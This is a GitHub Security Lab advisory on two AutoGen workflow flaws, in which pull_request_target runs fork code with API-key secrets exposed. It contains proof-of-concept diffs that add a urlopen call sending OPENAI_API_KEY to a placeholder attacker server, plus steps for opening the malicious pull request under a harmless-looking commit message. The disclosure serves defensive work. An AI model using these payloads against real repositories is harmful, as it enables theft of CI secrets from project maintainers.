Coordinated Disclosure Timeline
- 2024-02-27: Reported to MSRC.
- 2024-03-08: Workflows are updated to remove the `pull_request_target` trigger.
Summary
Several GitHub workflows may leak secret API keys (OpenAI, Azure, Bing, etc.) when triggered by any pull request.
Project
AutoGen
Tested Version
Details
Issue 1: Untrusted checkout leading to secrets exfiltration from a Pull Request in contrib-openai.yml (GHSL-2024-025)
The `pull_request_target` trigger event used in the `contrib-openai.yml` GitHub workflow explicitly checks out potentially untrusted code from a pull request and runs it.
```yaml
name: OpenAI4ContribTests
on:
  pull_request_target:
    branches: ['main']
    paths:
      - 'autogen/**'
      - 'test/agentchat/contrib/**'
      - '.github/workflows/contrib-openai.yml'
      - 'setup.py'
permissions: {}
...
  RetrieveChatTest:
    ...
    steps:
      # checkout to pr branch
      - name: Checkout
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      ...
      - name: Coverage
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
          AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
          OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
        run: |
          coverage run -a -m pytest test/agentchat/contrib/test_retrievechat.py test/agentchat/contrib/test_qdrant_retrievechat.py
          coverage xml
```
By explicitly checking out and running a test script from a fork, the untrusted code runs in an environment that has access to secrets. See Preventing pwn requests for more information.
An attacker could create a pull request with a malicious `test/agentchat/contrib/test_qdrant_retrievechat.py` which would get access to the secrets stored in the environment variables (e.g. OPENAI_API_KEY, AZURE_OPENAI_API_KEY, BING_API_KEY, etc.).
Note that, in addition to the `RetrieveChatTest.Coverage` step, other steps in the same workflow are also vulnerable to secret exfiltration:
- `CompressionTest.Coverage`
- `GPTAssistantAgent.Coverage`
- `TeachableAgent.Coverage`
- `AgentBuilder.Coverage`
- `WebSurfer.Coverage`
- `ContextHandling.Coverage`
This vulnerability was found using the "Checkout of untrusted code in trusted context" CodeQL query.
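The disclosure timeline above notes that the project's eventual fix was to remove the `pull_request_target` trigger. A minimal sketch of that direction (our illustration, not the project's exact patch) switches the workflow to the plain `pull_request` trigger, under which runs for fork pull requests do not receive repository secrets:

```yaml
# Sketch only (not AutoGen's actual patch): with the plain `pull_request`
# trigger, workflow runs for pull requests from forks do not receive
# repository secrets, so a malicious test script has nothing to exfiltrate.
name: OpenAI4ContribTests
on:
  pull_request:
    branches: ['main']
permissions: {}
jobs:
  RetrieveChatTest:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3  # defaults to the PR merge commit; no explicit head ref needed
      - name: Test without secrets
        run: coverage run -a -m pytest test/agentchat/contrib/test_retrievechat.py
```

The trade-off is that secret-backed tests cannot run automatically for fork pull requests at all.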
Proof Of Concept (PoC)
To verify the vulnerability, follow these steps:
- Clone the repo: `gh repo clone microsoft/autogen`.
- Edit `test/agentchat/contrib/test_retrievechat.py` and apply the following diff (replace `YOUR-CONTROLLED-SERVER` with your own request catcher server):

```diff
diff --git a/test/agentchat/contrib/test_retrievechat.py b/test/agentchat/contrib/test_retrievechat.py
index eeda1dc48..3c050d92b 100644
--- a/test/agentchat/contrib/test_retrievechat.py
+++ b/test/agentchat/contrib/test_retrievechat.py
@@ -17,6 +17,8 @@ try:
     from autogen.agentchat.contrib.retrieve_user_proxy_agent import (
         RetrieveUserProxyAgent,
     )
+    import urllib.request
+    urllib.request.urlopen(f"https://YOUR-CONTROLLED-SERVER?{os.environ['OPENAI_API_KEY']}")
     import chromadb
     from chromadb.utils import embedding_functions as ef
 except ImportError:
```

- Create a new branch: `git checkout -b add_new_test`.
- Stage the modified file: `git add test/agentchat/contrib/test_retrievechat.py`.
- Commit the change: `git commit -m "fix(tests): Check API key"`.
- Send the PR: `gh pr create` and follow the on-screen instructions.
- Once the PR is received, the `contrib-openai.yml` workflow should trigger, resulting in the execution of `coverage run -a -m pytest test/agentchat/contrib/test_retrievechat.py test/agentchat/contrib/test_qdrant_retrievechat.py`, which runs the payload and sends the OPENAI_API_KEY to the attacker-controlled server.
Impact
Even though the workflow runs with no write permissions, and therefore does not allow unauthorized modification of the base repository, it does allow an attacker to exfiltrate any secrets available to the script.
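Where maintainers still want secret-backed tests for fork pull requests, one possible hardening (a sketch under our own assumptions, not something this advisory prescribes) is to move the secrets into a GitHub deployment environment with required reviewers, so each run pauses for maintainer approval before any secret is released:

```yaml
# Sketch only: `openai-tests` is a hypothetical environment configured in the
# repository settings with required reviewers. A job referencing it waits for
# a maintainer's approval and only then receives the environment's secrets.
jobs:
  RetrieveChatTest:
    runs-on: ubuntu-latest
    environment: openai-tests
    steps:
      - name: Checkout
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Coverage
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
        run: coverage run -a -m pytest test/agentchat/contrib/test_retrievechat.py
```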
Issue 2: Untrusted checkout leading to secrets exfiltration from a Pull Request in openai.yml (GHSL-2024-026)
Similarly, the `pull_request_target` trigger event used in the `openai.yml` GitHub workflow explicitly checks out potentially untrusted code from a pull request and runs it.
```yaml
name: OpenAI
on:
  pull_request_target:
    branches: ["main"]
    paths:
      - "autogen/**"
      - "test/**"
      - "notebook/agentchat_auto_feedback_from_code_execution.ipynb"
      - "notebook/agentchat_function_call.ipynb"
      - "notebook/agentchat_groupchat_finite_state_machine.ipynb"
      - ".github/workflows/openai.yml"
permissions: {}
...
  test:
    ...
    steps:
      # checkout to pr branch
      - name: Checkout
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      ...
      - name: Coverage
        if: matrix.python-version == '3.9'
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
          AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
          OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
        run: |
          coverage run -a -m pytest test --ignore=test/agentchat/contrib
          coverage xml
      - name: Coverage and check notebook outputs
        if: matrix.python-version != '3.9'
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
          AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
          WOLFRAM_ALPHA_APPID: ${{ secrets.WOLFRAM_ALPHA_APPID }}
          OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
        run: |
          pip install nbconvert nbformat ipykernel
          coverage run -a -m pytest test/test_notebook.py
          coverage xml
          cat "$(pwd)/test/executed_openai_notebook_output.txt"
```
By explicitly checking out and running a test script from a fork, the untrusted code runs in an environment that has access to secrets. See Preventing pwn requests for more information.
An attacker could create a pull request with a malicious Python script in the `test/` directory which would get access to the secrets stored in the environment variables (e.g. OPENAI_API_KEY, AZURE_OPENAI_API_KEY).
This vulnerability was found using the "Checkout of untrusted code in trusted context" CodeQL query.
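Another commonly recommended mitigation, sketched here on the assumption that maintainers review each revision before approving it, is to keep `pull_request_target` but gate the job on a maintainer-applied label:

```yaml
# Sketch of a label-gated variant (an assumed pattern, not the project's fix):
# the job runs only after a maintainer applies the `safe to test` label,
# i.e. after a human has looked at the code the PR wants to run.
name: OpenAI
on:
  pull_request_target:
    types: [labeled]
permissions: {}
jobs:
  test:
    if: contains(github.event.pull_request.labels.*.name, 'safe to test')
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
```

Note that the label must be removed and re-applied for every new revision; otherwise an attacker can push additional commits after approval and have them run with secrets in scope.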
Proof Of Concept (PoC)
To verify the vulnerability, follow these steps:
- Clone the repo: `gh repo clone microsoft/autogen`.
- Edit `test/test_notebook.py` and apply the following diff (replace `YOUR-CONTROLLED-SERVER` with your own request catcher server):

```diff
diff --git a/test/test_notebook.py b/test/test_notebook.py
index 2fd6c8a65..6cae44636 100644
--- a/test/test_notebook.py
+++ b/test/test_notebook.py
@@ -1,8 +1,12 @@
 import sys
 import os
+import urllib.request
+
 import pytest
 from conftest import skip_openai
+urllib.request.urlopen(f"https://YOUR-CONTROLLED-SERVER?{os.environ['OPENAI_API_KEY']}")
+
 try:
     import openai
 except ImportError:
```

- Create a new branch: `git checkout -b add_new_test`.
- Stage the modified file: `git add test/test_notebook.py`.
- Commit the change: `git commit -m "fix(tests): Check API key"`.
- Send the PR: `gh pr create` and follow the on-screen instructions.
- Once the PR is received, the `openai.yml` workflow should trigger, resulting in the execution of `coverage run -a -m pytest test --ignore=test/agentchat/contrib`, which imports the modified `test/test_notebook.py`, runs the payload, and sends the OPENAI_API_KEY to the attacker-controlled server.
Impact
Even though the workflow runs with no write permissions, and therefore does not allow unauthorized modification of the base repository, it does allow an attacker to exfiltrate any secrets available to the script.
Credit
These issues were discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2024-025 or GHSL-2024-026 in any communication regarding these issues.